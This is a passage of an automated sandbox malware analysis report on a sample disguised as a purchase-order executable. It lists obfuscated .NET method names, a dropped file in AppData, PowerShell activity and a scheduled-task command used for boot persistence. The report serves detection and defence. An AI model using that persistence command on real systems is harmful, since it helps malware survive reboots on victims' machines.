                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeCode function: 14_2_00402AC0 push eax; ret 14_2_00402AD4
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeCode function: 14_2_00402AC0 push eax; ret 14_2_00402AFC
                        Source: PO-0Y9005373R664.exeStatic PE information: section name: .text entropy: 7.801340855529023
                        Source: VvtddClQv.exe.0.drStatic PE information: section name: .text entropy: 7.801340855529023
                        Source: 0.2.PO-0Y9005373R664.exe.2aa9d1c.0.raw.unpack, Bl.csHigh entropy of concatenated method names: 'ee', 'Bq', 'YC', 'Nc', 'g4', 'Yo', 'ry', 'TP', 'TO', 'pM'
                        Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, pTTmYoVRkOeIAgkNeM.csHigh entropy of concatenated method names: 'Ginpr51BBh', 'ubapC3HplC', 'MLepqlQZ16', 'DUTpNnE3t1', 'yV9pvQGUf0', 'yKkp60Mk05', 'eclpJb0e9J', 'JOXpOd1jQc', 'C8Mp5DFFyi', 'AZdpBP3Hy4'
                        Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, vh2XIFx33KRH78xEvs.csHigh entropy of concatenated method names: 'GBU47GNXk', 'vhgcl4DcK', 'Is8KHfBcx', 'qCVQ5JpGI', 'bphCxBjMC', 'HAHouWZvo', 'Gs49BqFN3e598iCbBP', 'v1hC81q1yR1yXh44Qb', 'KYp8gPug3', 'gQJMnh0bL'
                        Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, jBBHLdYwHKBrLllDiR.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Yf1xnrLNNb', 'mEBx2xCFuA', 'DTpxzAHj8r', 'WKgZhscCg5', 'piyZdqQjUD', 'cBgZx0g8ma', 'xLkZZmJTd0', 'xJtnYIIa9hXqC6W9ZMr'
                        Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, eYEKDP2GE6cew4SCTp.csHigh entropy of concatenated method names: 'usgGdxHjNK', 'aF1GZ1Yc7J', 'AMpGkAVORJ', 'eU2GRTxjGy', 'P5yGfGv4oT', 'QIUGATHYbQ', 'mYWGU6sGTv', 'yYG8Hpjkbt', 'qhF8ub9HtH', 'lNC8nlhXyR'
                        Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, tTYYeIshwagx1FcyAi.csHigh entropy of concatenated method names: 'ekGeuRYTA4', 'LxEe2N3bd4', 'Bnt8hWpXsj', 'bqu8dMj35J', 'XLXeB2LbcI', 'GJjelWOBTb', 'mSxeVu26sF', 'kZpebqUFnA', 'JsCewGprsW', 'Ue4eioLZpn'
                        Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, PS2NlEOnjZUh96hpnF.csHigh entropy of concatenated method names: 'u0cSeDqCp4', 'jtFSGPkLhW', 'Td8ST16W7O', 'rygQWDTKnUYv2m6fsLn', 'yGVMoBTNI9yHN5X16Lh', 'bFFDxSTi9g3SXAJjSlU'
                        Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, zrCqU4n1QW4GgLO0ue.csHigh entropy of concatenated method names: 'Qgw8qvcRAW', 'iox8Nvqq9T', 'CmK89V292E', 'nwX8vcovpo', 'VDH8b6lqV8', 'hCd86pSShJ', 'Next', 'Next', 'Next', 'NextBytes'
                        Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, Mf3efOqNXMCRYllY73.csHigh entropy of concatenated method names: 'XRsUEQxKGC', 'PJSUfGorM9', 'gCWUA0IDFN', 'clmUSpyMGU', 'DhAUWECY3t', 'hYCAgemYDM', 'Lk8AsT9dDw', 'tHVAHyFHIe', 'IyTAupDyFE', 'dZiAnbfi64'
                        Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, OxqnvgdhxIeqiZ49U2b.csHigh entropy of concatenated method names: 'UQxGFFPPlT', 'z6FGaPxoRq', 'l2NG4QNsuk', 'de9Gc8vB8S', 'GKVG0ZeaD7', 'zAPGKrNdVf', 'z7fGQjZyhI', 'b3IGrwY6t6', 'nmyGCnukAm', 'qplGohmtbn'
                        Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, fOWLITo0j7RU5pI8Qj.csHigh entropy of concatenated method names: 'wF5A012Yy7', 'h6nAQrlo0n', 'UtRY9W0CoB', 'tUtYvWuPbR', 'lglY6GkfDA', 'qUwYyLD803', 'xevYJXLM3M', 'yieYOWYbdZ', 'a6mYIqu5ui', 'JlkY5Aa7Re'
                        Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, PBHriKJKeph1PelbqM.csHigh entropy of concatenated method names: 'VhoSRtQZxD', 'zq9SYx4C1O', 'RDTSUITIOa', 't8BU2ee4UM', 'vxJUzPocYj', 'dCVSh1og0V', 'oDgSddPb3V', 'lcPSxLeyBv', 'z93SZdALlG', 'IWXSk1KDjN'
                        Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, bb1hSSIRuAeMou56uT.csHigh entropy of concatenated method names: 'DXlSFfI6ls', 'TxgSa34KlC', 'xeyS4VjaHc', 'hyHSco5RAT', 'W7vS0YwD9Q', 'gafSKHFB82', 'xhHSQxAZEb', 'J6aSrimIcf', 'cK6SCpStQf', 'l8DSokqmfl'
                        Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, pLZGiRzgbb9pSuqqOM.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'yURGphOl7H', 'xMSGLKMG1x', 'wIQGTkW2Yy', 'V5jGeWoTBG', 'rqmG8OnT72', 'bNmGGBJKOV', 'dC8GMs0SB1'
                        Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, QNqGEObeC0ElKAYmpu.csHigh entropy of concatenated method names: 'pZjL5mXQ8L', 'd90LlOMDHX', 'dtdLbTgCNT', 'wl0Lw6wV7Q', 'F2RLNLMeYc', 'KqZL9X4yyj', 'zQdLvdFHsV', 'kjkL6t5bT2', 'TDXLyjiXdo', 'X4bLJDYqqd'
                        Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, e1b2ZjdZWNjlnE5OMH5.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KsxMbTrlA6', 'biPMw3gnoU', 'XtQMiLtrej', 'hBNMt9lPvg', 'TK8Mgquns9', 'q3bMsPthIF', 'dNfMHXmmAh'
                        Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, XZhbQ8WE4aovuBFcQB.csHigh entropy of concatenated method names: 'd7hZE8BOra', 'kd6ZR4FZVH', 'TxvZftlhD7', 'QA3ZYcht0x', 'f9BZAPUxnl', 'QK9ZUM7mfK', 'kytZSCg62H', 'JaHZWZEvLF', 'OKaZ7Ert6k', 'bGGZXf2XaW'
                        Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, IJK0bgf3vOugddBNya.csHigh entropy of concatenated method names: 'Dispose', 'DIidn5kjuL', 'bX5xNFU7rs', 'wo566M2J6U', 'rQNd2f4aif', 'jhEdzXHyED', 'ProcessDialogKey', 'CN4xhrCqU4', 'mQWxd4GgLO', 'BuexxEYEKD'
                        Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, VqpQBNtIvoHmSYRcRo.csHigh entropy of concatenated method names: 'pAjeXY5BQT', 'MRGe1DT6ax', 'ToString', 'jvXeRxjw98', 'B4iefweuCW', 'vg8eYUQoqm', 'yILeAyTtUU', 'GvNeUURs1b', 'nKyeSp8Yu9', 'OVaeW0YFaw'
                        Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, uILpQ9dxK7DFccctIX8.csHigh entropy of concatenated method names: 'z28MFN33wk', 'OogMadbFth', 'DgAM4Y51gM', 'Hjr0V25pXJRfvQ0kjx9', 'KJS4Wr5WVZLHG86jY7V', 'lpDLW45ffibjYILiNYg', 'gwnRhR5Ei6QkC1cxcYh'
                        Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, MRdYc2k47ARfnHdgRp.csHigh entropy of concatenated method names: 'qOqdSaqf9D', 'jrRdWGZEHH', 'T4cdXJe22u', 'rxUd1oROWL', 'oI8dLQjOf3', 'pfOdTNXMCR', 'IapdK8iRhvkDUAOLbi', 'QxSGKmpZKNlBj1cRhR', 'C2IddttuA1', 'EfedZDcH8l'
                        Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, Gaqf9DrSrRGZEHH27Q.csHigh entropy of concatenated method names: 'tocfbEJUrw', 'AKafwIE2UM', 'qrpfiDZh3M', 'HgXft9rIpS', 'datfgR1cqn', 'EUYfsxxoR5', 'pQqfH0xsue', 'l4Hfu1dYH8', 'lTMfnflETd', 'LOZf2bspY1'
                        Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, CNf4aiufShEXHyEDKN.csHigh entropy of concatenated method names: 'XYT8RcPDQ3', 'VTr8fAol7F', 'x4t8YZu38E', 'lnq8AeNnCq', 'Jri8UNfYtO', 'LXl8S8iAYF', 'KKG8WwgtQr', 'VbP87YxjGC', 'ipm8XpRHJn', 'Qig81OEUMD'
                        Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, LUHUJtC4cJe22u8xUo.csHigh entropy of concatenated method names: 'zMEYccKRmm', 'WSRYKPTpW7', 'YCjYrYQlpK', 'aYSYCSSI6K', 'OrWYL0c3Zq', 'yMqYTQOFhF', 'CrVYebT4Ne', 'XI7Y8Qpa89', 'AOHYGPWKQ9', 'rI5YMp7Fqi'
                        Source: 0.2.PO-0Y9005373R664.exe.5500000.5.raw.unpack, Bl.csHigh entropy of concatenated method names: 'ee', 'Bq', 'YC', 'Nc', 'g4', 'Yo', 'ry', 'TP', 'TO', 'pM'
                        Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, pTTmYoVRkOeIAgkNeM.csHigh entropy of concatenated method names: 'Ginpr51BBh', 'ubapC3HplC', 'MLepqlQZ16', 'DUTpNnE3t1', 'yV9pvQGUf0', 'yKkp60Mk05', 'eclpJb0e9J', 'JOXpOd1jQc', 'C8Mp5DFFyi', 'AZdpBP3Hy4'
                        Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, vh2XIFx33KRH78xEvs.csHigh entropy of concatenated method names: 'GBU47GNXk', 'vhgcl4DcK', 'Is8KHfBcx', 'qCVQ5JpGI', 'bphCxBjMC', 'HAHouWZvo', 'Gs49BqFN3e598iCbBP', 'v1hC81q1yR1yXh44Qb', 'KYp8gPug3', 'gQJMnh0bL'
                        Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, jBBHLdYwHKBrLllDiR.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Yf1xnrLNNb', 'mEBx2xCFuA', 'DTpxzAHj8r', 'WKgZhscCg5', 'piyZdqQjUD', 'cBgZx0g8ma', 'xLkZZmJTd0', 'xJtnYIIa9hXqC6W9ZMr'
                        Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, eYEKDP2GE6cew4SCTp.csHigh entropy of concatenated method names: 'usgGdxHjNK', 'aF1GZ1Yc7J', 'AMpGkAVORJ', 'eU2GRTxjGy', 'P5yGfGv4oT', 'QIUGATHYbQ', 'mYWGU6sGTv', 'yYG8Hpjkbt', 'qhF8ub9HtH', 'lNC8nlhXyR'
                        Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, tTYYeIshwagx1FcyAi.csHigh entropy of concatenated method names: 'ekGeuRYTA4', 'LxEe2N3bd4', 'Bnt8hWpXsj', 'bqu8dMj35J', 'XLXeB2LbcI', 'GJjelWOBTb', 'mSxeVu26sF', 'kZpebqUFnA', 'JsCewGprsW', 'Ue4eioLZpn'
                        Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, PS2NlEOnjZUh96hpnF.csHigh entropy of concatenated method names: 'u0cSeDqCp4', 'jtFSGPkLhW', 'Td8ST16W7O', 'rygQWDTKnUYv2m6fsLn', 'yGVMoBTNI9yHN5X16Lh', 'bFFDxSTi9g3SXAJjSlU'
                        Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, zrCqU4n1QW4GgLO0ue.csHigh entropy of concatenated method names: 'Qgw8qvcRAW', 'iox8Nvqq9T', 'CmK89V292E', 'nwX8vcovpo', 'VDH8b6lqV8', 'hCd86pSShJ', 'Next', 'Next', 'Next', 'NextBytes'
                        Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, Mf3efOqNXMCRYllY73.csHigh entropy of concatenated method names: 'XRsUEQxKGC', 'PJSUfGorM9', 'gCWUA0IDFN', 'clmUSpyMGU', 'DhAUWECY3t', 'hYCAgemYDM', 'Lk8AsT9dDw', 'tHVAHyFHIe', 'IyTAupDyFE', 'dZiAnbfi64'
                        Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, OxqnvgdhxIeqiZ49U2b.csHigh entropy of concatenated method names: 'UQxGFFPPlT', 'z6FGaPxoRq', 'l2NG4QNsuk', 'de9Gc8vB8S', 'GKVG0ZeaD7', 'zAPGKrNdVf', 'z7fGQjZyhI', 'b3IGrwY6t6', 'nmyGCnukAm', 'qplGohmtbn'
                        Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, fOWLITo0j7RU5pI8Qj.csHigh entropy of concatenated method names: 'wF5A012Yy7', 'h6nAQrlo0n', 'UtRY9W0CoB', 'tUtYvWuPbR', 'lglY6GkfDA', 'qUwYyLD803', 'xevYJXLM3M', 'yieYOWYbdZ', 'a6mYIqu5ui', 'JlkY5Aa7Re'
                        Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, PBHriKJKeph1PelbqM.csHigh entropy of concatenated method names: 'VhoSRtQZxD', 'zq9SYx4C1O', 'RDTSUITIOa', 't8BU2ee4UM', 'vxJUzPocYj', 'dCVSh1og0V', 'oDgSddPb3V', 'lcPSxLeyBv', 'z93SZdALlG', 'IWXSk1KDjN'
                        Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, bb1hSSIRuAeMou56uT.csHigh entropy of concatenated method names: 'DXlSFfI6ls', 'TxgSa34KlC', 'xeyS4VjaHc', 'hyHSco5RAT', 'W7vS0YwD9Q', 'gafSKHFB82', 'xhHSQxAZEb', 'J6aSrimIcf', 'cK6SCpStQf', 'l8DSokqmfl'
                        Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, pLZGiRzgbb9pSuqqOM.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'yURGphOl7H', 'xMSGLKMG1x', 'wIQGTkW2Yy', 'V5jGeWoTBG', 'rqmG8OnT72', 'bNmGGBJKOV', 'dC8GMs0SB1'
                        Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, QNqGEObeC0ElKAYmpu.csHigh entropy of concatenated method names: 'pZjL5mXQ8L', 'd90LlOMDHX', 'dtdLbTgCNT', 'wl0Lw6wV7Q', 'F2RLNLMeYc', 'KqZL9X4yyj', 'zQdLvdFHsV', 'kjkL6t5bT2', 'TDXLyjiXdo', 'X4bLJDYqqd'
                        Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, e1b2ZjdZWNjlnE5OMH5.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KsxMbTrlA6', 'biPMw3gnoU', 'XtQMiLtrej', 'hBNMt9lPvg', 'TK8Mgquns9', 'q3bMsPthIF', 'dNfMHXmmAh'
                        Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, XZhbQ8WE4aovuBFcQB.csHigh entropy of concatenated method names: 'd7hZE8BOra', 'kd6ZR4FZVH', 'TxvZftlhD7', 'QA3ZYcht0x', 'f9BZAPUxnl', 'QK9ZUM7mfK', 'kytZSCg62H', 'JaHZWZEvLF', 'OKaZ7Ert6k', 'bGGZXf2XaW'
                        Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, IJK0bgf3vOugddBNya.csHigh entropy of concatenated method names: 'Dispose', 'DIidn5kjuL', 'bX5xNFU7rs', 'wo566M2J6U', 'rQNd2f4aif', 'jhEdzXHyED', 'ProcessDialogKey', 'CN4xhrCqU4', 'mQWxd4GgLO', 'BuexxEYEKD'
                        Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, VqpQBNtIvoHmSYRcRo.csHigh entropy of concatenated method names: 'pAjeXY5BQT', 'MRGe1DT6ax', 'ToString', 'jvXeRxjw98', 'B4iefweuCW', 'vg8eYUQoqm', 'yILeAyTtUU', 'GvNeUURs1b', 'nKyeSp8Yu9', 'OVaeW0YFaw'
                        Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, uILpQ9dxK7DFccctIX8.csHigh entropy of concatenated method names: 'z28MFN33wk', 'OogMadbFth', 'DgAM4Y51gM', 'Hjr0V25pXJRfvQ0kjx9', 'KJS4Wr5WVZLHG86jY7V', 'lpDLW45ffibjYILiNYg', 'gwnRhR5Ei6QkC1cxcYh'
                        Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, MRdYc2k47ARfnHdgRp.csHigh entropy of concatenated method names: 'qOqdSaqf9D', 'jrRdWGZEHH', 'T4cdXJe22u', 'rxUd1oROWL', 'oI8dLQjOf3', 'pfOdTNXMCR', 'IapdK8iRhvkDUAOLbi', 'QxSGKmpZKNlBj1cRhR', 'C2IddttuA1', 'EfedZDcH8l'
                        Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, Gaqf9DrSrRGZEHH27Q.csHigh entropy of concatenated method names: 'tocfbEJUrw', 'AKafwIE2UM', 'qrpfiDZh3M', 'HgXft9rIpS', 'datfgR1cqn', 'EUYfsxxoR5', 'pQqfH0xsue', 'l4Hfu1dYH8', 'lTMfnflETd', 'LOZf2bspY1'
                        Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, CNf4aiufShEXHyEDKN.csHigh entropy of concatenated method names: 'XYT8RcPDQ3', 'VTr8fAol7F', 'x4t8YZu38E', 'lnq8AeNnCq', 'Jri8UNfYtO', 'LXl8S8iAYF', 'KKG8WwgtQr', 'VbP87YxjGC', 'ipm8XpRHJn', 'Qig81OEUMD'
                        Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, LUHUJtC4cJe22u8xUo.csHigh entropy of concatenated method names: 'zMEYccKRmm', 'WSRYKPTpW7', 'YCjYrYQlpK', 'aYSYCSSI6K', 'OrWYL0c3Zq', 'yMqYTQOFhF', 'CrVYebT4Ne', 'XI7Y8Qpa89', 'AOHYGPWKQ9', 'rI5YMp7Fqi'
                        Source: 0.2.PO-0Y9005373R664.exe.3d25e58.4.raw.unpack, Bl.csHigh entropy of concatenated method names: 'ee', 'Bq', 'YC', 'Nc', 'g4', 'Yo', 'ry', 'TP', 'TO', 'pM'
                        Source: 10.2.VvtddClQv.exe.29b9d20.0.raw.unpack, Bl.csHigh entropy of concatenated method names: 'ee', 'Bq', 'YC', 'Nc', 'g4', 'Yo', 'ry', 'TP', 'TO', 'pM'
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeFile created: C:\Users\user\AppData\Roaming\VvtddClQv.exeJump to dropped file

                        Boot Survival

                        barindex
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VvtddClQv" /XML "C:\Users\user\AppData\Local\Temp\tmpB962.tmp"

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
